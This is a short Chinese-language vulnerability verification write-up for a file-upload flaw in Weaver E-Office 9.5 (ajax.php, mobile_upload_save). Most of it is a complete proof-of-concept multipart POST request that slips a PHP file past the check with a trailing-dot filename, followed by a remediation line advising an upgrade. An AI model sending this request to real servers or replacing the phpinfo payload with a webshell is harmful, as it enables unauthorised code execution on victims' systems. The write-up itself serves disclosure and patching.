漏洞验证-泛微E-Office ajax.php mobile_upload_save 文件上传漏洞

一、漏洞描述

泛微E-Office 9.5的App/Ajax/Ajax.php页面存在不受限制的文件上传漏洞，攻击者可利用该漏洞上传webshell并执行恶意代码。

二、验证POC

POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
Host: XXXX
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Length: 204
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="upload_quwan"; filename="123.php."
Content-Type: image/jpeg

<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt

 

http://XXXX/attachment//xxxx

三、验证截图

四、整改建议

联系官方升级至最新版本